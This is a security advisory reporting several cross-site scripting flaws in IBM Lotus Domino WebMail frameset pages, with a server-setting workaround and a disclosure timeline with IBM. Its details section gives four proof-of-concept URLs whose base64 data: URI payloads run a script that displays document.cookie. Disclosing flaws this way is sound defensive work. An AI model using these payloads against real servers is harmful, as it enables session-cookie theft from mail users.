Multiple XSS vulnerabilities in IBM Lotus Domino

Hello 3APA3A!

I want to warn you about multiple Cross-Site Scripting vulnerabilities in IBM Lotus Domino.

Last year I've announced multiple vulnerabilities in IBM software and after IBM fixed many of them, I've disclosed them. These are new vulnerabilities in Domino, which I've found at 03.05.2012 together with other holes.

In August 2012 I've wrote about vulnerabilities in IBM Lotus Domino, which were related to Domino WebMail. I'll add new vulnerabilities in WebMail to previous two holes. Which had CVE-2012-3302 and described in IBM Security Bulletin: Aug-2012 IBM Lotus Domino Web Server Cross-Site Scripting Vulnerabilities (http://www-01.ibm.com/support/docview.wss?uid=swg21608160). IBM haven't created new CVE and new advisory for these vulnerabilities (at least they didn't tell me and I didn't find it at their site).

Affected products:

Vulnerable are IBM Lotus Domino 8.5.4 and previous versions. These vulnerabilities have been fixed in Domino 9.0. Which was recently released. So every user of Domino can upgrade to latest 9.0 version or to use workaround for previous versions (provided bellow).

Details:

Cross-Site Scripting (WASC-08):

The attack is possible via data: and vbscript: URI.

http://site/mail/x.nsf/CalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://site/mail/x.nsf/WebInteriorCalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://site/mail/x.nsf/ToDoFS?OpenFrameSet?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://site/mail/x.nsf/WebInteriorToDoFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Workaround:

There is a workaround for these XSS vulnerabilities:

To avoid this attack, administrators can set the following variable on the Domino server NOTES.INI, available in release 7.0 and later:

DominoValidateFramesetSRC=1

This method can be used for versions prior to Domino 9 (where these XSS holes were fixed).

Timeline:

Full timeline read in the first advisory (http://securityvulns.ru/docs28474.html).

• During 16.05-20.05.2012 I've wrote announcements about multiple vulnerabilities in IBM software at my site.
• During 16.05-20.05.2012 I've wrote five advisories via contact form at IBM site.
• At 31.05.2012 I've resend five advisories to IBM PSIRT, which they received and said they would send them to the developers (of Lotus products).
• At 15.08.2012 IBM released their advisory (above-mentioned) - just few from total amount of holes.
• At 12.12.2012 after IBM fixed part of the holes, which I sent them in May, I sent them new vulnerabilities in Lotus Domino.
• At 15.12.2012 remind IBM about last holes. No answer.
• At 02.03.2013 again remind IBM about last holes - since more then 2,5 months there was no answer from them.
• At 08.03.2013 IBM answered, holes will be fixed in Domino 9.0.
• At 25.03.2013 I've disclosed these vulnerabilities at my site (http://websecurity.com.ua/6390/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua